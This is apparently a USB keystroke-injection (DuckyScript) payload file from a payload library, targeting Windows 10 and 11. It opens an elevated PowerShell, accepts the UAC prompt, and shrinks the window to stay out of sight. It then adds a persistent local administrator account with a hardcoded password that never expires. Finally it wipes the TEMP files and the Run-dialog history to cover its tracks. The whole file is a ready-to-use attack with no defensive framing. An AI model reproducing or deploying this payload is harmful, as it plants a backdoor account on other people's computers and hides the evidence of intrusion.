Path: blob/master/payloads/library/execution/Add_Local_Admin/payload.txt
2971 views
REM Title: Add_Local_Admin1REM Author: LulzAnarchyAnon2REM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload3REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared.4REM This lightning fast payload deployed, and was completed in a test run in 10.57 seconds5REM Target: Windows 10 and 116REM Props: Darren Kitchen, and I am Jakoby7REM Version: 3.08REM Category: Execution91011DELAY 20012GUI r13DELAY 20014STRINGLN powershell -Command "Start-Process PowerShell -Verb RunAs"15DELAY 50016ALT y17DELAY 50018STRINGLN19PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"20$Username = "Admin2"21$Password = "password"22$group = "Administrators"23$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"24$existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }25if ($existing -eq $null) {26Write-Host "Creating new local user $Username."27& NET USER $Username $Password /add /y /expires:never28Write-Host "Adding local user $Username to $group."29& NET LOCALGROUP $group $Username /add30}31{32Write-Host "Setting password for existing local user $Username."33$existing.SetPassword($Password)34}35Write-Host "Ensuring password for $Username never expires."36& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE37rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue38reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f39exit40exit41END_STRINGLN424344